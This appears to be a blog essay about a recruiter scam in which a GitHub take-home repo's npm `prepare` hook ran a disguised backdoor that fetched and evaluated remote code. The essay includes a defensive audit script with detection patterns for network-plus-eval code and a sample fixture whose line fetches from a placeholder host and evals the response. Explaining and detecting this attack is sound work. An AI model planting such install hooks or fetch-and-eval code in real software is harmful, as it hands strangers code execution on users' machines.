A recruiter messaged a developer on LinkedIn about a job, using the stolen identity of a real arts journalist. She asked him to look at a GitHub repository — specifically, to "check out the deprecated Node modules issue". That instruction was the whole attack. It was bait to make him run `npm install`.

The most reliable path into a hardened company now runs through the people applying to work there. Not its servers, not its VPN — its candidates. And the payload doesn't need to be clever, because the interview is the one setting where we ask engineers to execute a stranger's code and call it diligence.

The mechanism was mundane. The backdoor lived in `app/test/index.js`, about 250 lines dressed up as test code. The trigger was `package.json`'s `prepare` script, which npm runs automatically after `npm install`: it loaded `app/index.js`, which pulled in the test file, which assembled a URL — `rest-icon-handler.store/icons/77` — and executed whatever the server sent back. No zero-day. Fetch and eval. The repo even carried 39 commits falsely attributed to a real full-stack developer who'd been impersonated before.
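The shape described above is easy to check for before anything runs. Here is an added example, not code from the post or from the repository it describes, that reads a `package.json` and the sources it points at and flags two things: lifecycle hooks npm would execute without asking, and files that both reach the network and execute what they get. The sample data is constructed and the domain is a placeholder.

```javascript
// Added example: audit a take-home repo BEFORE running npm install.
// Constructed sample data; not the post's repo or its hostile domain.
const LIFECYCLE = ['preinstall', 'install', 'postinstall',
                   'prepublish', 'preprepare', 'prepare', 'postprepare'];

// Together these two patterns make up the "fetch and eval" shape.
const REMOTE = /\b(https?:\/\/|fetch\(|axios|require\(['"]https?['"]\))/;
const EXEC = /\b(eval\(|new Function\(|vm\.runIn|child_process)/;

// Lifecycle hooks that npm runs on its own during install.
function findAutoRunScripts(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE.filter((k) => k in scripts)
                  .map((k) => ({ hook: k, cmd: scripts[k] }));
}

// True when a source file both talks to the network and executes code.
function looksLikeFetchAndEval(src) {
  return REMOTE.test(src) && EXEC.test(src);
}

// pkgJsonText: contents of package.json; sources: { path: file contents }.
function audit(pkgJsonText, sources) {
  const hooks = findAutoRunScripts(JSON.parse(pkgJsonText));
  const suspicious = Object.entries(sources)
    .filter(([, src]) => looksLikeFetchAndEval(src))
    .map(([file]) => file);
  return {
    hooks,
    suspicious,
    safeToInstall: hooks.length === 0 && suspicious.length === 0,
  };
}

// Constructed sample mirroring the structure the post describes.
const samplePkg = JSON.stringify({
  name: 'take-home',
  scripts: { prepare: 'node app/index.js', test: 'mocha' },
});
const sampleSources = {
  'app/index.js': "require('./test/index.js');",
  'app/test/index.js':
    "const u = 'https://PLACEHOLDER.invalid/icons/77';" +
    'fetch(u).then((r) => r.text()).then((b) => eval(b));',
};

const sampleReport = audit(samplePkg, sampleSources);
console.log(JSON.stringify(sampleReport, null, 2));
```

A clean repo with only a `test` script and no network-plus-exec file comes back `safeToInstall: true`; the sample above does not, because of the `prepare` hook and `app/test/index.js`.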

> A repo that runs whatever a server hands it was enough evidence. (Hacker News)

We have spent fifteen years drilling developers on a single reflex: don't run untrusted code. Don't open the attachment. Don't curl-pipe-bash from a random gist. Verify the checksum. Then we built a hiring process whose central ritual is cloning a stranger's repository and running it. A take-home assignment is a request to execute arbitrary code from someone you've never met, under social pressure, while trying to impress them.

The candidate's competence was the vulnerability. `npm install` was the click.

Call it phishing with extra steps, then. The auto-run-on-install trick is old — `prepare` scripts have been a known supply-chain vector for years, and the standard answer is awareness: train people to spot it. Fine. But awareness doesn't survive contact with the job market. You cannot tell an engineer to never clone the repo, never run the take-home, never trust the recruiter, when doing exactly those things is how you get the offer. The behavior the attack exploits isn't a lapse in vigilance. It's the job.

So the fix isn't a sharper reflex; it's a safer default. Run the unknown repo in a container or a throwaway VM that can't reach your keychain or your home directory — not because you've decided this recruiter is hostile, but so that trusting her never has to be the thing standing between you and a drained wallet. The industry has the tools. What it lacks is the habit of treating "I'm just looking at their code" as the dangerous act it is.

The recruiter asked him to evaluate the repository. He did — and what it evaluated back was him. The interview ran in both directions. Most of us only notice the half we were invited to.